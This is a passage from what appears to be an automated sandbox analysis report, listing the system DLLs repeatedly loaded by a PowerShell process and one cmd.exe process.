    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rstrtmgr.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
